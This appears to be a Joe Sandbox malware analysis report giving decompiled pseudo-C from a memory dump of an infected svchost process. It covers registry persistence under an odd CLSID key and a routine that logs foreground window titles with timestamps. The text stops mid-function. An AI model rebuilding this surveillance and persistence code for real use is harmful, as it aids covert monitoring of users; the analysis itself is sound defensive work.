                                                            • Instruction ID: a1ed136c1bc14f645c1dd243ba9af2f75d37d86376ee4b9951e290ea84218c24
                                                            • Opcode Fuzzy Hash: 5b67b33968174e760cf79a53cf29cb5545573e63a39bffb90f0deaf9dd6e02fa
                                                            • Instruction Fuzzy Hash: F941E533714B8496EB228FA5E45C3DAB7A1FBC9B94F448220DA8903B5ADF3DC449C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 52%
                                                            			E0000022B22BAF53C770(void* __ecx, long long __rax, void* __rdx, void* __rsi, void* __r8) {
                                                            				void* _t12;
                                                            				void* _t15;
                                                            				void* _t20;
                                                            				long long _t23;
                                                            				intOrPtr _t24;
                                                            				long long _t27;
                                                            				void* _t32;
                                                            				intOrPtr _t35;
                                                            				void* _t38;
                                                            				void* _t39;
                                                            				void* _t40;
                                                            
                                                            				_t23 = __rax;
                                                            				r8d = r8d - 1;
                                                            				_t24 =  *((intOrPtr*)(_t39 + 0x50));
                                                            				_t35 =  *((intOrPtr*)(_t39 + 0x58));
                                                            				_t40 = _t39 + 0x40;
                                                            				_pop(_t32);
                                                            				goto 0xaf53cb30;
                                                            				_t12 = E0000022B22BAF54DAD0(__rdx + 1);
                                                            				asm("adc eax, [ds:ecx]");
                                                            				 *((intOrPtr*)(_t38 - 0x397bf040)) =  *((intOrPtr*)(_t38 - 0x397bf040)) + _t12;
                                                            				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t12;
                                                            				asm("rol dword [eax], 1");
                                                            				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t12;
                                                            				_t27 =  *0xaf599c18; // 0x0
                                                            				if (_t27 == 0) goto 0xaf53c7c3;
                                                            				 *((char*)(_t27 + 1)) = 0;
                                                            				E0000022B22BAF53C310(_t20, _t27);
                                                            				 *0xaf599c18 = 0;
                                                            				E0000022B22BAF55A7EC(_t23, _t27);
                                                            				 *((intOrPtr*)(_t40 + 0x20)) = _t24 - 1;
                                                            				_t15 = E0000022B22BAF5342D0(_t23, _t24, _t23,  *((intOrPtr*)(_t35 + 8)),  *((intOrPtr*)(_t35 + 8)), _t38, _t32 + 1);
                                                            				 *0xaf599c18 = _t23;
                                                            				return _t15;
                                                            			}

                                                            0x22baf53c770
                                                            0x22baf53c770
                                                            0x22baf53c779
                                                            0x22baf53c77e
                                                            0x22baf53c783
                                                            0x22baf53c787
                                                            0x22baf53c788
                                                            0x22baf53c78d
                                                            0x22baf53c78e
                                                            0x22baf53c791
                                                            0x22baf53c797
                                                            0x22baf53c79b
                                                            0x22baf53c79d
                                                            0x22baf53c79f
                                                            0x22baf53c7ad
                                                            0x22baf53c7af
                                                            0x22baf53c7b3
                                                            0x22baf53c7b8
                                                            0x22baf53c7c8
                                                            0x22baf53c7d3
                                                            0x22baf53c7de
                                                            0x22baf53c7e3
                                                            0x22baf53c7f9

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateValue$EventOpenQuerywsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 2801368686-1865207932
                                                            • Opcode ID: 6c38d988e4275f80fd67e948962211e87cb4319abc680d30facb9dcf2d5dfe16
                                                            • Instruction ID: 72950bba680846268b578d5d3d8c281e06cd02e0fdbe0605691c564ec91d8080
                                                            • Opcode Fuzzy Hash: 6c38d988e4275f80fd67e948962211e87cb4319abc680d30facb9dcf2d5dfe16
                                                            • Instruction Fuzzy Hash: 7631D533214B84A2EB319FA5F49C3DEB360F788794F400126DA8D03A5ADF79C105CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateValue
                                                            • String ID: SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}
                                                            • API String ID: 1818849710-2030040551
                                                            • Opcode ID: a21e8377b68b8e6e3f473a400492c874138a9856dcec82d784891677b925615a
                                                            • Instruction ID: 4049cde319afc7536f5073000061bcf2fd136d840b15002a8139c15c5cf69cc2
                                                            • Opcode Fuzzy Hash: a21e8377b68b8e6e3f473a400492c874138a9856dcec82d784891677b925615a
                                                            • Instruction Fuzzy Hash: 4B316933618B80A6EB719F54F44C78AB7A0F3847A4F444215EB9943BA9DF3AC145CB04
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E0000022B22BAF5489C0(signed int __ecx, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                            				void* __rdi;
                                                            				void* _t21;
                                                            				void* _t23;
                                                            				void* _t25;
                                                            				void* _t35;
                                                            				intOrPtr _t37;
                                                            				void* _t38;
                                                            				intOrPtr _t40;
                                                            				long long* _t48;
                                                            				intOrPtr _t51;
                                                            				void* _t52;
                                                            				long long _t60;
                                                            
                                                            				_t60 = __rsi;
                                                            				_a16 = __rbx;
                                                            				_t48 = __rcx;
                                                            				if (__rcx == __rdx) goto 0xaf548ab9;
                                                            				_t37 =  *((intOrPtr*)(__rcx + 0x18));
                                                            				if (_t37 - 8 < 0) goto 0xaf548a3c;
                                                            				_t51 =  *((intOrPtr*)(__rcx));
                                                            				_t38 = _t37 + 1;
                                                            				if (_t38 - 0xffffffff > 0) goto 0xaf548ac7;
                                                            				if (_t38 + _t38 - 0x1000 < 0) goto 0xaf548a37;
                                                            				if ((__ecx & 0x0000001f) != 0) goto 0xaf548acd;
                                                            				_t40 =  *((intOrPtr*)(_t51 - 8));
                                                            				if (_t40 - _t51 >= 0) goto 0xaf548ad3;
                                                            				_t52 = _t51 - _t40;
                                                            				if (_t52 - 8 < 0) goto 0xaf548ad9;
                                                            				if (_t52 - 0x27 > 0) goto 0xaf548adf;
                                                            				0xaf55a85c();
                                                            				 *((long long*)(__rcx + 0x18)) = 7;
                                                            				_a8 = __rsi;
                                                            				 *((long long*)(__rcx + 0x10)) = __rsi;
                                                            				if ( *((long long*)(__rcx + 0x18)) - 8 < 0) goto 0xaf548a5b;
                                                            				goto 0xaf548a5e;
                                                            				 *((short*)(__rcx)) = 0;
                                                            				_t35 =  *((long long*)(__rdx + 0x18)) - 8;
                                                            				if (_t35 >= 0) goto 0xaf548a82;
                                                            				if (_t35 == 0) goto 0xaf548a8b;
                                                            				_t21 = E0000022B22BAF562BA0(__ecx, _t23, 0, _t25, __rcx, __rdx, __rdx, __rsi,  *((intOrPtr*)(__rdx + 0x10)) + 1 +  *((intOrPtr*)(__rdx + 0x10)) + 1);
                                                            				goto 0xaf548a8b;
                                                            				 *_t48 =  *__rdx;
                                                            				 *((long long*)(__rdx)) = _t60;
                                                            				 *((long long*)(_t48 + 0x10)) =  *((intOrPtr*)(__rdx + 0x10));
                                                            				 *((long long*)(_t48 + 0x18)) =  *((intOrPtr*)(__rdx + 0x18));
                                                            				 *((long long*)(__rdx + 0x18)) = 7;
                                                            				 *((long long*)(__rdx + 0x10)) = _t60;
                                                            				if ( *((long long*)(__rdx + 0x18)) - 8 < 0) goto 0xaf548ab1;
                                                            				 *((short*)( *__rdx)) = 0;
                                                            				return _t21;
                                                            			}

                                                            0x22baf5489c0
                                                            0x22baf5489c0
                                                            0x22baf5489cd
                                                            0x22baf5489d3
                                                            0x22baf5489d9
                                                            0x22baf5489e1
                                                            0x22baf5489e3
                                                            0x22baf5489e6
                                                            0x22baf5489f6
                                                            0x22baf548a05
                                                            0x22baf548a0a
                                                            0x22baf548a10
                                                            0x22baf548a17
                                                            0x22baf548a1d
                                                            0x22baf548a24
                                                            0x22baf548a2e
                                                            0x22baf548a37
                                                            0x22baf548a3c
                                                            0x22baf548a44
                                                            0x22baf548a50
                                                            0x22baf548a54
                                                            0x22baf548a59
                                                            0x22baf548a5e
                                                            0x22baf548a61
                                                            0x22baf548a66
                                                            0x22baf548a70
                                                            0x22baf548a7b
                                                            0x22baf548a80
                                                            0x22baf548a85
                                                            0x22baf548a88
                                                            0x22baf548a8f
                                                            0x22baf548a97
                                                            0x22baf548a9b
                                                            0x22baf548aa8
                                                            0x22baf548aac
                                                            0x22baf548ab1
                                                            0x22baf548ac6

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$Desktop$CloseEventInputOpen
                                                            • String ID:
                                                            • API String ID: 3681804378-0
                                                            • Opcode ID: 351bd4cf82b72b7d9a8270b8672b5d02ceb0758ad5389e9b2972241de80f60ff
                                                            • Instruction ID: fb65f65d38e3c80f54ff935a97ffc768579a732a4d638fa437c36db7430e0cc6
                                                            • Opcode Fuzzy Hash: 351bd4cf82b72b7d9a8270b8672b5d02ceb0758ad5389e9b2972241de80f60ff
                                                            • Instruction Fuzzy Hash: E441E433A11B44A2EE2A9B96D04D3DD7362F704B96F044914DB7D03B97EF79D0A08340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF534F40(void* __rax, long long __rbx, void* __rdx, long long _a24) {
                                                            				void* _t5;
                                                            				void* _t7;
                                                            
                                                            				_t7 = __rax;
                                                            				_a24 = __rbx;
                                                            				_t5 = E0000022B22BAF564404(__rax, __rdx, lstrlenW(??) + 1 + lstrlenW(??) + 1, __rdx);
                                                            				if (_t7 != 0) goto 0xaf534f76;
                                                            				return _t5;
                                                            			}

                                                            0x22baf534f40
                                                            0x22baf534f40
                                                            0x22baf534f5e
                                                            0x22baf534f69
                                                            0x22baf534f75

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CharNext$AttributesCreateDirectoryErrorFileLastlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 227312388-0
                                                            • Opcode ID: b98922420a5a91ca64204dd2e015ca6674b61012e891329521c81d132bef4861
                                                            • Instruction ID: 779f1a96c97dc4ab0577428471040b9d52b0d326b5fd73714e16e661744aaffa
                                                            • Opcode Fuzzy Hash: b98922420a5a91ca64204dd2e015ca6674b61012e891329521c81d132bef4861
                                                            • Instruction Fuzzy Hash: 87419113600641A1EF769F96A56C3F973F0E741F94F889114DA0A03796EF3AC895C390
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Value$Query$Delete$CloseOpen
                                                            • String ID:
                                                            • API String ID: 2816288289-0
                                                            • Opcode ID: f93e3db65b3185e220e16303b92621299856dfc2623d298f8a7286e3c4b46d5f
                                                            • Instruction ID: 1439cf365db2884a67a27ed2bfc2cababd9de57df83b3df8e853c9e3292d6a55
                                                            • Opcode Fuzzy Hash: f93e3db65b3185e220e16303b92621299856dfc2623d298f8a7286e3c4b46d5f
                                                            • Instruction Fuzzy Hash: 0C418B37728B8096EB718F52E84C79EB7A5F788BC0F441025AA8E47B29DF39C500CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 25%
                                                            			E0000022B22BAF551BA0(long long _a8, long long _a16) {
                                                            				void* _t46;
                                                            				void* _t48;
                                                            				void* _t51;
                                                            				long long _t58;
                                                            				long long _t59;
                                                            				void* _t61;
                                                            				void* _t73;
                                                            				void* _t75;
                                                            				long long _t76;
                                                            				void* _t78;
                                                            				void* _t82;
                                                            				intOrPtr _t83;
                                                            
                                                            				_a8 = _t59;
                                                            				_a16 = _t76;
                                                            				_t75 = _t61;
                                                            				EnterCriticalSection(??);
                                                            				if ( *((intOrPtr*)(_t75 + 0x80)) == 0) goto 0xaf551be7;
                                                            				E0000022B22BAF564114(_t46, _t48, _t51, _t59, _t73, _t76, _t82);
                                                            				 *((long long*)(_t75 + 0x80)) = _t76;
                                                            				 *((long long*)(_t75 + 0x88)) = _t76;
                                                            				 *((long long*)(_t75 + 0x90)) = _t76;
                                                            				ResetEvent(??);
                                                            				ResetEvent(??);
                                                            				ResetEvent(??);
                                                            				if ( *((intOrPtr*)(_t75 + 0x1c0)) <= 0) goto 0xaf551c77;
                                                            				asm("o16 nop [eax+eax]");
                                                            				_t83 =  *((intOrPtr*)(_t75 + 0x1c8));
                                                            				if (_t83 ==  *((intOrPtr*)(_t75 + 0x1d0))) goto 0xaf551c41;
                                                            				_t58 =  *((intOrPtr*)(_t83 + 8));
                                                            				 *((long long*)(_t75 + 0x1c8)) = _t58;
                                                            				 *((long long*)(_t58 + 0x10)) = _t76;
                                                            				goto 0xaf551c54;
                                                            				if (_t83 == 0) goto 0xaf551c77;
                                                            				 *((long long*)(_t75 + 0x1c8)) = _t76;
                                                            				 *((long long*)(_t75 + 0x1d0)) = _t76;
                                                            				if (_t83 == 0) goto 0xaf551c77;
                                                            				 *((long long*)(_t83 + 8)) = _t76;
                                                            				 *((long long*)(_t83 + 0x10)) = _t76;
                                                            				 *((intOrPtr*)(_t75 + 0x1c0)) =  *((intOrPtr*)(_t75 + 0x1c0)) - 1;
                                                            				HeapFree(??, ??, ??);
                                                            				goto 0xaf551c20;
                                                            				E0000022B22BAF53CE40(_t59, _t75 + 0xc8, _t73, _t76, _t78);
                                                            				if ( *((intOrPtr*)(_t75 + 0x98)) == 0) goto 0xaf551c95;
                                                            				HeapDestroy(??);
                                                            				HeapCreate(??, ??, ??);
                                                            				 *((long long*)(_t75 + 0x98)) = _t58;
                                                            				 *((intOrPtr*)(_t75 + 0x1f8)) = 0;
                                                            				 *((intOrPtr*)(_t75 + 0x200)) = 0;
                                                            				 *((intOrPtr*)(_t75 + 0x1fc)) = 0;
                                                            				 *((intOrPtr*)(_t75 + 0x6c)) = 3;
                                                            				SetEvent(??);
                                                            				return LeaveCriticalSection(??);
                                                            			}

                                                            0x22baf551ba0
                                                            0x22baf551ba5
                                                            0x22baf551baf
                                                            0x22baf551bb9
                                                            0x22baf551bcb
                                                            0x22baf551bcd
                                                            0x22baf551bd2
                                                            0x22baf551bd9
                                                            0x22baf551be0
                                                            0x22baf551bee
                                                            0x22baf551bfb
                                                            0x22baf551c08
                                                            0x22baf551c14
                                                            0x22baf551c16
                                                            0x22baf551c20
                                                            0x22baf551c2e
                                                            0x22baf551c30
                                                            0x22baf551c34
                                                            0x22baf551c3b
                                                            0x22baf551c3f
                                                            0x22baf551c44
                                                            0x22baf551c46
                                                            0x22baf551c4d
                                                            0x22baf551c57
                                                            0x22baf551c59
                                                            0x22baf551c5f
                                                            0x22baf551c63
                                                            0x22baf551c6f
                                                            0x22baf551c75
                                                            0x22baf551c7e
                                                            0x22baf551c8d
                                                            0x22baf551c8f
                                                            0x22baf551ca9
                                                            0x22baf551caf
                                                            0x22baf551cba
                                                            0x22baf551cc0
                                                            0x22baf551cc6
                                                            0x22baf551ccc
                                                            0x22baf551cd3
                                                            0x22baf551cef

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Event$HeapReset$CreateCriticalDestroyEnterFreeSection
                                                            • String ID:
                                                            • API String ID: 1658878062-0
                                                            • Opcode ID: ea9856bec81fc313ff7bd5c827af577a1273390f3cc89269c27676be64fff0af
                                                            • Instruction ID: cdf9dee239bd7db46abb8241ea923a91bf15be16947b330491317a1727bc8a68
                                                            • Opcode Fuzzy Hash: ea9856bec81fc313ff7bd5c827af577a1273390f3cc89269c27676be64fff0af
                                                            • Instruction Fuzzy Hash: A9311633601B80F2EA6E9BA1E64C3ECB7A4F748B84F104516DB6A43752CF3294B5C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 17%
                                                            			E0000022B22BAF5441B0(void* __edx, void* __rcx, void* __rdx, void* __r8) {
                                                            				void* __rbx;
                                                            				void* __rsi;
                                                            				void* __r14;
                                                            				void* _t86;
                                                            				signed long long _t106;
                                                            				signed long long _t107;
                                                            				signed long long _t110;
                                                            				signed long long _t111;
                                                            				signed long long _t113;
                                                            				long long _t115;
                                                            				long long _t135;
                                                            				intOrPtr _t145;
                                                            				void* _t146;
                                                            				void* _t147;
                                                            				void* _t148;
                                                            				signed long long _t149;
                                                            				void* _t156;
                                                            				void* _t157;
                                                            
                                                            				_t147 = _t148 - 0x1c0;
                                                            				_t149 = _t148 - 0x2c0;
                                                            				_t106 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t107 = _t106 ^ _t149;
                                                            				 *(_t147 + 0x1b0) = _t107;
                                                            				_t156 = __rcx;
                                                            				_t146 = __rdx;
                                                            				 *((intOrPtr*)(_t147 - 0x80)) = 0;
                                                            				_t135 = __rdx + 1;
                                                            				_t86 = __r8 - 1;
                                                            				_t115 = __rcx + _t135;
                                                            				 *((long long*)(_t149 + 0x78)) = _t135;
                                                            				 *((long long*)(_t149 + 0x70)) = _t115;
                                                            				r14d = r8d;
                                                            				if (_t115 - _t135 - 4 >= 0) goto 0xaf544211;
                                                            				 *((intOrPtr*)(_t147 - 0x80)) = 1;
                                                            				goto 0xaf54421c;
                                                            				 *((long long*)(_t149 + 0x78)) = _t135 + 4;
                                                            				E0000022B22BAF543530(_t149 + 0x70);
                                                            				if ( *((intOrPtr*)(_t147 - 0x80)) != 0) goto 0xaf544404;
                                                            				asm("xorps xmm0, xmm0");
                                                            				 *((intOrPtr*)(_t149 + 0x60)) = 0;
                                                            				r8d = r14d;
                                                            				 *((intOrPtr*)(_t147 - 0x80)) = 0;
                                                            				asm("movdqu [esp+0x70], xmm0");
                                                            				E0000022B22BAF53DE20(__edx, _t107, _t113, _t149 + 0x70, _t146, _t146, _t157);
                                                            				r9d = 0x20119;
                                                            				r8d = 0;
                                                            				 *(_t149 + 0x20) = _t149 + 0x68;
                                                            				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0xaf5443c1;
                                                            				 *(_t149 + 0x38) = _t113;
                                                            				 *(_t149 + 0x30) = _t113;
                                                            				 *(_t149 + 0x28) = _t113;
                                                            				 *(_t149 + 0x20) = _t113;
                                                            				 *((intOrPtr*)(_t149 + 0x64)) = 0x104;
                                                            				if (RegEnumKeyExW(??, ??, ??, ??, ??, ??, ??, ??) != 0) goto 0xaf5443b6;
                                                            				asm("o16 nop [eax+eax]");
                                                            				r9d = 0x20119;
                                                            				 *(_t149 + 0x20) = _t147 - 0x70;
                                                            				r8d = 0;
                                                            				 *((intOrPtr*)(_t149 + 0x60)) = 0;
                                                            				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0xaf544334;
                                                            				_t110 = _t149 + 0x60;
                                                            				 *(_t149 + 0x58) = _t113;
                                                            				r9d = 0;
                                                            				 *(_t149 + 0x50) = _t113;
                                                            				r8d = 0;
                                                            				 *(_t149 + 0x48) = _t113;
                                                            				 *(_t149 + 0x40) = _t113;
                                                            				 *(_t149 + 0x38) = _t113;
                                                            				 *(_t149 + 0x30) = _t113;
                                                            				 *(_t149 + 0x28) = _t113;
                                                            				 *(_t149 + 0x20) = _t110;
                                                            				RegQueryInfoKeyW(??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
                                                            				RegCloseKey(??);
                                                            				_t111 = _t110 | 0xffffffff;
                                                            				_t112 = _t111 + 1;
                                                            				if ( *((intOrPtr*)(_t147 - 0x60 + 2 + _t111 * 2)) != 0) goto 0xaf544340;
                                                            				r8d = 2 + (_t111 + 1) * 2;
                                                            				E0000022B22BAF53DE20(0, _t111 + 1, _t113, _t149 + 0x70, _t147 - 0x60, _t146, _t157);
                                                            				r8d = 4;
                                                            				 *((intOrPtr*)(_t147 - 0x78)) =  *((intOrPtr*)(_t149 + 0x60));
                                                            				E0000022B22BAF53DE20(0, _t111 + 1, _t113, _t149 + 0x70, _t147 - 0x78, _t146, _t157);
                                                            				 *(_t149 + 0x38) = _t113;
                                                            				 *(_t149 + 0x30) = _t113;
                                                            				 *(_t149 + 0x28) = _t113;
                                                            				 *(_t149 + 0x20) = _t113;
                                                            				 *((intOrPtr*)(_t149 + 0x64)) = 0x104;
                                                            				if (RegEnumKeyExW(??, ??, ??, ??, ??, ??, ??, ??) == 0) goto 0xaf5442c0;
                                                            				RegCloseKey(??);
                                                            				if (_t107 == 0) goto 0xaf5443ce;
                                                            				E0000022B22BAF55A7E4(_t111 + 1, _t107);
                                                            				_t145 =  *((intOrPtr*)(_t149 + 0x70));
                                                            				if (_t145 != 0) goto 0xaf5443dd;
                                                            				goto 0xaf5443e8;
                                                            				r9b = 0x3f;
                                                            				r8d =  *((intOrPtr*)(_t149 + 0x78)) -  *((intOrPtr*)(_t149 + 0x70));
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t156 + 8)), _t145);
                                                            				if (_t145 == 0) goto 0xaf544404;
                                                            				E0000022B22BAF55A7E4(_t112, _t145);
                                                            				return E0000022B22BAF55A7C0(_t86, _t112,  *(_t147 + 0x1b0) ^ _t149);
                                                            			}
                                                            0x22baf5441bb
                                                            0x22baf5441c3
                                                            0x22baf5441ca
                                                            0x22baf5441d1
                                                            0x22baf5441d4
                                                            0x22baf5441db
                                                            0x22baf5441e0
                                                            0x22baf5441e3
                                                            0x22baf5441e6
                                                            0x22baf5441e9
                                                            0x22baf5441ed
                                                            0x22baf5441f0
                                                            0x22baf5441f5
                                                            0x22baf5441fa
                                                            0x22baf544204
                                                            0x22baf544206
                                                            0x22baf54420f
                                                            0x22baf544217
                                                            0x22baf544221
                                                            0x22baf54422c
                                                            0x22baf544232
                                                            0x22baf544235
                                                            0x22baf544239
                                                            0x22baf54423c
                                                            0x22baf544247
                                                            0x22baf54424d
                                                            0x22baf544257
                                                            0x22baf54425d
                                                            0x22baf544260
                                                            0x22baf544273
                                                            0x22baf544283
                                                            0x22baf54428c
                                                            0x22baf544293
                                                            0x22baf54429a
                                                            0x22baf54429f
                                                            0x22baf5442af
                                                            0x22baf5442b5
                                                            0x22baf5442c9
                                                            0x22baf5442cf
                                                            0x22baf5442d4
                                                            0x22baf5442d7
                                                            0x22baf5442e9
                                                            0x22baf5442ef
                                                            0x22baf5442f4
                                                            0x22baf5442f9
                                                            0x22baf5442fc
                                                            0x22baf544301
                                                            0x22baf544304
                                                            0x22baf54430b
                                                            0x22baf544310
                                                            0x22baf544315
                                                            0x22baf54431a
                                                            0x22baf54431f
                                                            0x22baf544324
                                                            0x22baf54432e
                                                            0x22baf544338
                                                            0x22baf544345
                                                            0x22baf544349
                                                            0x22baf54434b
                                                            0x22baf54435c
                                                            0x22baf544369
                                                            0x22baf54436f
                                                            0x22baf544377
                                                            0x22baf544386
                                                            0x22baf54438f
                                                            0x22baf544396
                                                            0x22baf54439b
                                                            0x22baf5443a0
                                                            0x22baf5443b0
                                                            0x22baf5443bb
                                                            0x22baf5443c4
                                                            0x22baf5443c9
                                                            0x22baf5443ce
                                                            0x22baf5443d6
                                                            0x22baf5443db
                                                            0x22baf5443ec
                                                            0x22baf5443ef
                                                            0x22baf5443f2
                                                            0x22baf5443fa
                                                            0x22baf5443ff
                                                            0x22baf544424

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEnumOpen$InfoQuery
                                                            • String ID:
                                                            • API String ID: 396531129-0
                                                            • Opcode ID: f25342361dbc1c131d6f18fd2f464d559ad3126229c17c03f8f4a052551edb80
                                                            • Instruction ID: 58d608f3c7ac71f1076ce2968bfad68f8aad63a02e7b5ba01f5a52e88ab76fb0
                                                            • Opcode Fuzzy Hash: f25342361dbc1c131d6f18fd2f464d559ad3126229c17c03f8f4a052551edb80
                                                            • Instruction Fuzzy Hash: 2061A073608B8496EB21CFA5F8896DEBBB1F784788F544225EE8943A59DF39C045CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 63%
                                                            			E0000022B22BAF53D620(void* __ebx, long long __rbx, void* __rcx, signed int __rdi, long long __rsi, void* _a16, long long _a24, void* _a32) {
                                                            				signed int _v24;
                                                            				char _v2072;
                                                            				char _v2600;
                                                            				signed short _v2604;
                                                            				signed short _v2606;
                                                            				signed short _v2608;
                                                            				signed short _v2610;
                                                            				signed short _v2614;
                                                            				signed short _v2616;
                                                            				signed int _v2632;
                                                            				signed int _v2640;
                                                            				signed int _v2648;
                                                            				signed int _v2656;
                                                            				signed int _v2664;
                                                            				void* __rbp;
                                                            				signed int _t48;
                                                            				signed int _t49;
                                                            				void* _t59;
                                                            				void* _t68;
                                                            				void* _t69;
                                                            				void* _t73;
                                                            				signed long long _t82;
                                                            				signed long long _t83;
                                                            				void* _t85;
                                                            				intOrPtr* _t87;
                                                            				signed short* _t94;
                                                            				signed short* _t96;
                                                            				signed long long _t113;
                                                            				signed long long _t114;
                                                            				intOrPtr _t117;
                                                            				intOrPtr _t118;
                                                            				intOrPtr* _t119;
                                                            				struct _SYSTEMTIME* _t121;
                                                            				void* _t122;
                                                            				void* _t124;
                                                            				long long _t130;
                                                            				void* _t131;
                                                            
                                                            				if (__rcx == 0) goto 0xaf53d82f;
                                                            				_t131 = _t124;
                                                            				_t82 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t83 = _t82 ^ _t124 - 0x00000a80;
                                                            				_v24 = _t83;
                                                            				 *((long long*)(_t131 + 0x10)) = __rbx;
                                                            				_t122 = __rcx;
                                                            				 *((long long*)(_t131 + 0x20)) = __rdi;
                                                            				_t113 = __rdi | 0xffffffff;
                                                            				if ( *((short*)(__rcx + (_t113 + 1) * 2)) != 0) goto 0xaf53d660;
                                                            				if (__ebx - 1 < 0) goto 0xaf53d807;
                                                            				_a24 = __rsi;
                                                            				GetForegroundWindow();
                                                            				r8d = 0x101;
                                                            				_v2616 = _t83;
                                                            				GetWindowTextW(??, ??, ??);
                                                            				_t117 =  *0xaf599e30; // 0x0
                                                            				_t130 = _v2616;
                                                            				_t73 = _t130 -  *((intOrPtr*)(_t117 + 0x10));
                                                            				if (_t73 != 0) goto 0xaf53d6dc;
                                                            				_t11 = _t117 + 0x18; // 0x18
                                                            				_t94 = _t11;
                                                            				_t48 =  *(_t94 +  &_v2600 - _t94) & 0x0000ffff;
                                                            				if (_t73 != 0) goto 0xaf53d6d4;
                                                            				if (_t48 != 0) goto 0xaf53d6c0;
                                                            				if (( *_t94 & 0x0000ffff) - _t48 == 0) goto 0xaf53d7a8;
                                                            				_t85 = _t117 -  &_v2600;
                                                            				_t96 =  &_v2600;
                                                            				_t16 = _t85 + 0x18; // 0x18
                                                            				_t49 =  *_t96 & 0x0000ffff;
                                                            				 *(_t16 + _t96) = _t49;
                                                            				if (_t49 != 0) goto 0xaf53d6f0;
                                                            				 *((long long*)(_t117 + 0x10)) = _t130;
                                                            				_t114 = _t113 + 1;
                                                            				if ( *((short*)( &_v2600 + _t114 * 2)) != 0) goto 0xaf53d710;
                                                            				if (_t114 == 0) goto 0xaf53d7a8;
                                                            				r8d = 0x800;
                                                            				E0000022B22BAF563830(_t59, 0, _t68, _t69,  &_v2072, _t16, _t114,  &_v2600 - _t94);
                                                            				GetLocalTime(_t121);
                                                            				r8d = _v2610 & 0x0000ffff;
                                                            				r10d = _v2614 & 0x0000ffff;
                                                            				r9d = _v2616 & 0x0000ffff;
                                                            				_v2632 = _v2604 & 0x0000ffff;
                                                            				_v2640 = _v2606 & 0x0000ffff;
                                                            				_v2648 = _v2608 & 0x0000ffff;
                                                            				_v2656 = r8d;
                                                            				_v2664 = r10d;
                                                            				wsprintfW(??, ??);
                                                            				E0000022B22BAF53D620(__ebx, _t113 + 1,  &_v2072, _t114, _t117);
                                                            				_t118 =  *0xaf599e30; // 0x0
                                                            				if ( *((char*)(_t118 + 0x218)) == 0) goto 0xaf53d7c0;
                                                            				E0000022B22BAF53D490(__ebx,  &_v2600, _t113 + 1, _t122, _t122, _t130);
                                                            				_t119 =  *0xaf599e30; // 0x0
                                                            				if ( *_t119 + __ebx - 0x400 <= 0) goto 0xaf53d7e6;
                                                            				_t40 = _t119 + 0x422; // 0x422
                                                            				r8d = 0x800;
